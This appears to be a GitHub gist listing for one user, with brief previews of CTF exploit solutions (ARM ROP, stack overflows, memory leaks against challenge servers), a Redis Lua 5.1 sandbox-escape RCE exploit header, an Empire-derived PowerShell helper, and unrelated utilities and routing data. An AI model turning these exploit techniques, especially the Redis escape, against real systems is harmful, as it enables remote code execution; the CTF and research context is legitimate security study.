
@c3c
c3c / dotnet-identity-hash.py
Created December 8, 2021 15:45
Conversion of identity hashes
from base64 import b64decode, b64encode
from struct import pack, unpack
from binascii import hexlify
import sys
def u32(x): return unpack(">I", x)[0]
def p32(x): return pack(">I", x)
hash = b64decode(sys.argv[1]).replace(b"-",b"")
@c3c
c3c / Invoke-ZipFolder.ps1
Created June 26, 2018 11:05
Invoke-ZipFolder.ps1
# Invoke-ZipFolder from https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/zipfolder.py
# also works on older PowerShell versions, worrying though that it displays a dialog, see https://github.com/EmpireProject/Empire/issues/135
function Invoke-ZipFolder
{
    param([string]$Folder, [string]$ZipFileName)
    if (-not (Test-Path $Folder)) {
        "Target folder $Folder doesn't exist."
        return
    }
@c3c
c3c / hackitctf2017-pwn200.py
Created August 27, 2017 17:47
HackIT CTF 2017 Pwn200
# solution for HackIT CTF 2017 pwn200 challenge
# my first ARM exploit :0
# binary is NX + ASLR enabled on the server
# there's a format string vulnerability as well as a buffer overflow
# we can obtain the stack canary through the format string, then perform the overflow.
# since NX is enabled, we have to ROP our way to a shell
# - c3c
from pwn import *
context.arch = 'arm'
@c3c
c3c / redis-lua-linux-x86-poc.py
Created February 24, 2017 09:29
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
@c3c
c3c / rollthedice.py
Last active October 9, 2016 13:59
Hackover CTF rollthedice solution
from pwn import *
from Crypto.Cipher import AES
r = remote("challenges.hackover.h4q.it", 1415)
def decr(key, roll):
    return u16(AES.new(key).decrypt(roll)[:2], endian="big")
for i in range(32):
    r.recvuntil("My dice roll: ")
@c3c
c3c / ping_gnop.py
Created October 9, 2016 12:41
Hackover CTF ping_gnop solution
from pwn import *
# the binary reverses our payload and checks for a number of bad bytes
# generated a ropchain and modified it to work
def ropchain():
    # modified ropchain generated with ropper
    # ropper's badbytes option didn't work correctly...
    from struct import pack
@c3c
c3c / bookshellf.py
Created October 9, 2016 12:25
Hackover CTF bookshellf solution
from pwn import *
context.os = 'linux'
context.arch = "amd64"
#r = process("./bookshellf")
r = remote("challenges.hackover.h4q.it", 31337)
# using the book 'seek' function we can read past the array boundary and leak memory
# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)
@c3c
c3c / SimpleHTTPServerWithUpload.py
Last active July 7, 2016 16:54 — forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload and allowing to bind different addresses
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
#!/bin/sh
##
## netscreen/jnpr ssl vpn connection magic
## oogali@idlepattern.com / @oogali
##
## i wrote this about a year ago (2009), when i had continuous access
## to a jnpr ssl vpn box and had to connect via it.
##
## if bits of this script are broken, i'll be glad to fix if someone
## gives me client access to a ssl vpn box to test against.
@c3c
c3c / camions.dat
Last active December 15, 2015 11:59
C+VRP+TW working + asserts added Updated data English comments
/*********************************************
* OPL 12.5 Data
* Author: crash
* Creation Date: Mar 6, 2013 at 3:38:56 PM
*********************************************/
// 17 nodes, first node is depot.
// <Name, NodeType {collab|client}, WGS84-Lat, WGS84-Lon, Lam93-X, Lam93-Y, TimeWin-Min, TimeWin-Max>
AllNodes = {
<"Poitiers" 1,46.589069,0.340576,496421,6613320,360,1200>, // 0